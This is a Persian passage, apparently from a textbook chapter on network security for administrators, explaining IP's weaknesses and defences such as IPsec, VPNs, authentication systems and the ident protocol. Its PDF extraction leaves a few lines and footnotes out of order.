ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ،ﺩﻳﺪﻩﺑﺎﻧﻲ ﺷﺒﻜﻪ ،ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺑﺴﺘﻪ ،ﺩﺳﺘﻜﺎﺭﻱ ﺩﺍﺩﻩﻫﺎ ،ﺭﺑﻮﺩﻥ ﺍﺗﺼﺎﻝ ،ﻭ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺖ .ﺑﺴﻴﺎﺭﻱ
ﺍﺯ ﺍﻳﻦ ﺣﻤﻼﺕ ﺳﺎﻟﻬﺎ ﭘﻴﺶ ﺍﺯ ﺍﻳﻨﻜﻪ ﺩﺭ ﻋﻤﻞ ﺭﺥ ﺩﻫﻨﺪ ﭘﻴﺶﺑﻴﻨﻲ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ،ﻭ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻠﻬﺎ ﻫﻨﻮﺯ ﺗﺪﺑﻴﺮ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ
ﺣﻔﺎﻇﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﻧﻬﺎ ﻧﺪﺍﺭﻧﺪ.
IPﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﻃﺮﺍﺣﻲ ﻧﺸﺪﻩ ﻭ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﻋﻤﺪﻱ ﻣﻘﺎﻭﻡ ﻧﻴﺴﺖ ،ﺍﻣﺎ ﺑﺎ ﺗﻜﻨﻴﻜﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﻣﻲﺗﻮﺍﻥ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪﻫﺎﻱ IP
ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩ .ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﺗﻜﻨﻴﻜﻬﺎ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑﺮﻧﺎﻣﻪ ،ﺭﻣﺰﻧﮕﺎﺭﻱ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﭘﻴﺸﺮﻓﺘﻪ ،SSH ،ﻭ
ﻼ ﺑﻪ ﺗﻔﺼﻴﻞ ﺷﺮﺡ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺍﻗﺪﺍﻣﺎﺗﻲ ﭼﻮﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ )ﻛﻮﺯﻩﻫﺎﻱ ﻋﺴﻞ( .ﻫﺮ ﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺫﻳ ﹰ
ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ )ﻛﻪ ﭘﻴﺸﺘﺮ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪ( ،ﻣﻘﺎﻭﻡ ﺳﺎﺧﺘﻦ ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ )ﻛﻪ ﺩﺭ ﻓﺼﻞ ٥ﺍﺯ ﻫﻤﻴﻦ ﺑﺨﺶ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺖ( ،ﻭ
ﺟﺪﺍ ﻛﺮﺩﻥ ﻓﻴﺰﻳﻜﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺯ ﺷﺒﻜﻪ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺑﺎﻻ ﺑﺮﺩﻥ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺑﻜﺎﺭ ﺭﻭﻧﺪ.
۲۹۳ﺍﺯ ﻧﻈﺮ ﻓﻨﻲ ،ﻧﺎﻡ ﻣﻴﺰﺑﺎﻧﻬﺎ ﻧﺒﺎﻳﺪ ﺣﺎﻭﻱ ﺯﻳﺮﺧﻂ ﺑﺎﺷﻨﺪ ،ﺍﻣﺎ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻧﻬﺎ ﺭﺍ ﺑﻪ ﺁﺩﺭﺱ IPﻧﮕﺎﺷﺖ ﻣﻲﻛﻨﻨﺪ ﺑﻄﻮﺭ ﻟﺠﻮﺟﺎﻧﻪ ﺯﻳﺮﺧﻂ ﺭﺍ ﻗﺒﻮﻝ
ﻣﻲﻛﻨﻨﺪ ﻭ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻧﻴﺰ ﺩﺭ ﺳﺮﻭﻳﺲ Active Directoryﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺭﺍ ﺍﻟﺰﺍﻣﻲ ﻛﺮﺩﻩ ،ﻛﻪ ﺍﻳﻦ ﺍﻣﺮ ﺑﺮﺧﻼﻑ ﺣﺪﺍﻗﻞ ﻳﻚ RFCﻣﻲﺑﺎﺷﺪ.
۲۹۴ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ RFCﻫﺎﻱ ﺷﻤﺎﺭﺓ ۱۱۲۲ﻭ ۱۱۲۳ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ.
٤٠٣ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻣﻲﻛﻨﻨﺪ ﻭ ﻟﺬﺍ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﻣﺸﺎﺑﻬﻲ ﺩﺭ ﺁﻧﻬﺎ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﭘﻴﺸﺘﺮ ﺩﺭ ﻫﻤﻴﻦ ﻓﺼﻞ ﺑﺤﺚ ﺁﻥ ﺷﺪ ،ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﻭ ﺷﺒﻜﻪﻫﺎﻱ
ﺑﻲﺳﻴﻢ ﺭﺍ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺷﻨﻮﺩ ﻛﺮﺩ؛ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺍﻧﺘﻘﺎﻻﺕ IPﺭﻭﻱ ﺧﻄﻮﻁ ﺗﻠﻮﻳﺰﻳﻮﻥ ﻭ ﻳﺎ ﺧﻄﻮﻁ ﺑﺮﻕ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ
ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
ﺧﻼﺻﺔ ﻣﻄﻠﺐ ﺍﻳﻨﻜﻪ ﺩﺭ ﺑﻴﺸﺘﺮ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺷﺒﻜﻪ ،ﺟﻠﻮﮔﻴﺮﻱ ﻭ ﻳﺎ ﺣﺘﻲ ﺷﻨﺎﺳﺎﻳﻲ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻣﻤﻜﻦ ﻧﻴﺴﺖ ﻭ ﺗﻨﻬﺎ ﺑﺎﻳﺪ ﻓﺮﺽ ﺭﺍ ﺑﺮ ﺁﻥ
ﮔﺬﺍﺷﺖ ﻛﻪ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﻪ ﻣﻮﺭﺩ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﺳﻌﻲ ﻛﺮﺩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ،ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ.
ﺍﻟﺒﺘﻪ ﺑﺎﻳﺪ ﺩﺭﻧﻈﺮ ﺩﺍﺷﺖ ﮐﻪ ﺣﺘﻲ ﺩﺭﺻﻮﺭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻴﺰ ﺁﺩﺭﺳﻬﺎ ﻭ ﭘﻮﺭﺗﻬﺎﻱ ﻣﺒﺪﺃ ﻭ ﻣﻘﺼﺪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﻗﺎﺑﻞ ﻛﺸﻒ ﻭ
ﺍﺳﺘﻔﺎﺩﻩ ﺑﺮﺍﻱ ﺗﺤﻠﻴﻞ ﺗﺮﺍﻓﻴﻚ ﻫﺴﺘﻨﺪ.
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻪ ﻃﺮﻕ ﻣﺨﺘﻠﻔﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ IPﻛﻤﻚ ﻛﻨﺪ:
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺩﻭ ﺍﻧﺘﻬﺎ
ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﻣﻴﺰﺑﺎﻥ ﻓﺮﺳﺘﻨﺪﻩ ،ﻣﺤﺘﻮﺍﻱ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻭ ﻫﻨﮕﺎﻡ ﺩﺭﻳﺎﻓﺖ ﺑﺴﺘﻪﻫﺎ ﺩﺭ ﻃﺮﻑ ﺩﻳﮕﺮ ،ﺍﻳﻦ ﻣﺤﺘﻮﻳﺎﺕ ﺑﻄﻮﺭ
ﺧﻮﺩﻛﺎﺭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﺷﻮﻧﺪ .ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻣﻮﻗﻌﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ
ﺭﻣﺰﮔﺬﺍﺭ ﺑﻬﺮﻩ ﻣﻲﮔﻴﺮﻧﺪ .ﺍﻳﻦ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻳﻚ ﺍﺩﺍﺭﺓ ﺷﺮﻛﺖ ﺑﻪ ﺍﺩﺍﺭﺓ ﺩﻳﮕﺮﻱ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﺑﻤﻨﻈﻮﺭ
ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻣﻬﺎﺟﻤﺎﻥ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﻛﻨﻨﺪ )ﺍﻳﻦ ﺭﻭﺵ ﺗﺤﺖ ﻋﻨﻮﺍﻥ VPNﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ(؛ ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺑﺴﺘﻪﻫﺎﻳﻲ
ﻛﻪ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﻳﮕﺮ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻤﻲﻧﻤﺎﻳﻨﺪ.
ﺍﻣﺮﻭﺯﻩ ﺍﻳﻦ ﻧﻮﻉ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﺳﻄﺢ ﺑﺴﺘﻪ ﺑﻄﻮﺭ ﻋﺎﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻞ IPsecﺍﻧﺠﺎﻡ ﻣﻲﮔﻴﺮﺩ )ﻛﻪ ﺩﺭ RFCﺷﻤﺎﺭﺓ ٢٤٠١ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ
ﺷﺪﻩ ﺍﺳﺖ( IPsec .ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻏﻴﺮﻣﺤﺴﻮﺱ ﺗﻤﺎﻣﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺩﻭ ﻣﻴﺰﺑﺎﻥ ،ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﻭ ﻳﻚ
ﺷﺒﻜﻪ ،ﻭ ﻳﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺩﻭ ﺷﺒﻜﻪ ﺑﻜﺎﺭ ﺑﺮﺩ .ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ IPsecﺭﻭﺵ ﻗﺪﺭﺗﻤﻨﺪﻱ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺧﻮﺩﻛﺎﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ
ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﺪﺍﺭﻧﺪ.
ﺑﺮﺍﻱ ﻫﺮ ﻳﻚ ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ DNS .ﺍﺯ ﺍﻣﻀﺎﻱ ﺭﻣﺰﺷﺪﺓ ﺩﺍﺩﻩﻫﺎﻱ ﻣﻨﻄﻘﻪﺍﻱ ﻭ ﺗﺼﺪﻳﻖ
ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﺸﺘﺮﻙ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺘﻲ ﻗﺎﺩﺭﻧﺪ ﻓﺮﺳﺘﻨﺪﮔﺎﻥ
ﻣﻌﺘﺒﺮ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ SMTP AUTHﺑﺮﺍﻱ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﺪ ﻭ ﭘﻴﺎﻣﻬﺎﻱ ﺷﺒﮑﻪﻫﺎﻱ ﺧﺒﺮﻱ ﺭﺍ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺑﺎ
ﻧﺮﻡﺍﻓﺰﺍﺭ PGPﺍﻣﻀﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﺮﺩ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻣﺮﻭﺯ ﻛﺎﺭﺑﺮﺩ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﭼﻨﺪﺍﻥ ﮔﺴﺘﺮﺩﻩ ﻧﻴﺴﺖ.
IPsecﻛﻪ ﺩﺭ ﺑﺎﻻ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪ ،ﺍﻣﻜﺎﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺸﺎﺑﻪ ﺭﺍ ﻧﻴﺰ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ .ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ
ﺗﺮﺍﻓﻴﻚ IPﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ VPNﺍﻳﻨﭽﻨﻴﻨﻲ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ ﺍﺯ ﻫﻤﺎﻥ ﻣﻨﺒﻌﻲ ﺑﺎﺷﺪ ﻛﻪ ﺍﺩﻋﺎﻱ ﺁﻧﺮﺍ ﺩﺍﺭﺩ ،ﺍﻣﺎ ﺩﺭ ﺑﻴﺸﺘﺮ ﺧﺪﻣﺎﺕ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﺯ VPNﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﺷﻮﺩ.
ident
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺸﻜﻼﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺯ ﺁﻧﺠﺎ ﻧﺎﺷﻲ ﻣﻲﺷﻮﺩ ﻛﻪ ﭘﺮﻭﺗﻜﻞ TCP/IPﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻛﺎﻧﺎﻟﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳﺖ ﻭ
ﻧﻪ ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ .ﻫﻨﮕﺎﻣﻴﻜﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻳﻚ ﺍﺗﺼﺎﻝ TCP/IPﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﺪ ،ﺁﺩﺭﺱ IPﺁﻧﺮﺍ ﻣﻲﺩﺍﻧﺪ .ﺑﺎ ﺍﻳﻦ
ﻭﺟﻮﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻫﻴﭻ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻧﺎﻡ ﺷﺨﺼﻲ ﻛﻪ ﺍﺭﺗﺒﺎﻁ TCP/IPﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩ ﺩﺭ ﺩﺳﺖ ﻧﺪﺍﺭﻧﺪ.
ﺯﻣﺎﻧﻴﻜﻪ ﭘﺮﻭﺗﻜﻞ TCP/IPﺑﻮﺟﻮﺩ ﺁﻣﺪ ﻧﻴﺎﺯﻱ ﺑﻪ ﻳﻚ ﺭﻭﺵ ﻛﻠﻲ ﺍﺣﺴﺎﺱ ﻧﻤﻲﺷﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑﺘﻮﺍﻥ ﻧﺎﻡ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺗﺼﺎﻟﻬﺎﻱ
TCP/IPﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﻧﺪ ﺭﺍ ﻛﺸﻒ ﻛﺮﺩ ،ﻭ ﺍﻳﻨﻜﺎﺭ ﺑﻌﺪﻫﺎ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﻛﻪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺍﻟﺰﺍﻣﻲ ﻣﻲﺩﺍﻧﺴﺘﻨﺪ )ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ
(FTP ،SMTPﻋﻤﻠﻲ ﺷﺪ .ﺑﺎ ﺭﺷﺪ ﺍﻳﻨﺘﺮﻧﺖ ،ﻣﺪﻳﺮﺍﻥ ﺷﺒﻜﻪﻫﺎ ﺩﻟﻴﻞ ﻣﻬﻤﻲ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻧﺎﻡ ﺁﻏﺎﺯﮔﺮﺍﻥ ﺍﺗﺼﺎﻻﺕ TCP/IPﭘﻴﺪﺍ ﻛﺮﺩﻧﺪ؛ ﻭ
ﺁﻥ ﺩﻟﻴﻞ ﭼﻴﺰﻱ ﻧﺒﻮﺩ ﺟﺰ "ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ" .ﺍﮔﺮ ﺭﺍﻫﺒﺮ ﺭﺍﻩ ﺩﻭﺭ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺘﻮﺟﻪ ﺷﻮﺩ ﻛﻪ ﺩﺭ ﺳﺎﻋﺖ ١٧:٠٠ﻛﺎﺭﺑﺮﻱ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻪ
ﻧﺎﻡ fas.harvard.eduﺭﺍﻳﺎﻧﺔ ﺍﻭ ﺭﺍ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ،ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﺍﻳﻦ ﺣﻤﻠﻪ ﺭﺍ ﺭﺩﮔﻴﺮﻱ ﻛﻨﺪ ﻭ ﻛﺎﺭﺑﺮ ﻭ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﺴﺌﻮﻝ
ﺣﻤﻠﻪ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻧﻤﺎﻳﺪ ،ﺗﺎ ﺁﻥ ﻛﺎﺭﺑﺮ ﺗﻨﺒﻴﻪ ﺷﺪﻩ ﻭ ﻳﺎ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﺴﺪﻭﺩ ﮔﺮﺩﺩ.
ﭘﺮﻭﺗﻜﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺭﻭﺵ ﺳﺎﺩﺓ ﺗﻤﺎﺱ ﻣﻌﻜﻮﺱ ،ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﺑﻪ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﻲﻛﻨﺪ .ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻗﺼﺪ
ﺩﺍﺭﺩ ﭘﻲ ﺑﻪ ﻧﺎﻡ ﻭﺍﻗﻌﻲ ﺁﻏﺎﺯﮔﺮ ﺍﺗﺼﺎﻝ TCP/IPﺑﺒﺮﺩ ،ﺍﺑﺘﺪﺍ ﻳﻚ ﺍﺗﺼﺎﻝ ﺑﺎ (identd) ident daemonﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ
ﺑﺮﻗﺮﺍﺭ ﺳﺎﺧﺘﻪ ﻭ ﺗﻮﺻﻴﻔﻲ ﺍﺯ ﺍﺗﺼﺎﻝ TCP/IPﺟﺎﺭﻱ ﺑﻪ ﺁﻥ ﻣﻲﻓﺮﺳﺘﺪ؛ ﻭ ﺳﭙﺲ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﻧﻴﺰ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺑﺮ ﺁﻏﺎﺯﮔﺮ ﺍﺗﺼﺎﻝ ﺭﺍ ﺩﺭ
ﻗﺎﻟﺐ ﻳﻚ ﻓﺎﻳﻞ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﺎﺯﭘﺲ ﻣﻲﻓﺮﺳﺘﺪ.
ﺩﺭ ﮔﺬﺷﺘﻪ ﺗﻨﻬﺎ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﭘﺎﺳﺦ ﺳﻴﺴﺘﻢ ﺩﺭﺧﻮﺍﺳﺖﻛﻨﻨﺪﻩ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﺪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮ ﺑﻮﺩ ،ﺍﻣﺎ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﺍﺧﻴﺮ identd
ﺍﻣﻜﺎﻥ ﺑﺎﺯﭘﺲ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻥ ﻳﻚ ﻧﺸﺎﻥ ﺭﻣﺰﺷﺪﻩ ﺭﺍ ﻧﻴﺰ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻧﺸﺎﻥ ﭘﺲ ﺍﺯ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺑﺎ
ﻣﺸﺎﺭﻛﺖ ﺳﺎﻳﺖ ﺍﺟﺮﺍﻛﻨﻨﺪﻩ identdﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﻮﺩ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺎﻋﺚ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻓﺸﺎﻱ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﺭﺍﻩ ﺩﻭﺭ ﺑﺎ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﻴﺸﺘﺮﻳﻦ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ identdﺩﺭ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻬﺎﺟﻤﺎﻧﻲ ﺑﻮﺩﻩ ﻛﻪ ﺣﻤﻼﺕ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻭ ﻳﺎ ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﺍﺭﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ
ﺑﺰﺭﮒ ﻭ ﭼﻨﺪﻛﺎﺭﺑﺮﺓ Unixﺍﻧﺠﺎﻡ ﻣﻲﺩﺍﺩﻩﺍﻧﺪ .ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺭﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺪﻭﻥ ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺗﻌﺎﻣﻠﻲ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ Unix
ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺭﺩﻳﺎﺑﻲ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺩﺭﮔﻴﺮ ﺩﺭ ﺭﺧﺪﺍﺩ identd ،ﺭﺍ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻨﺪ.
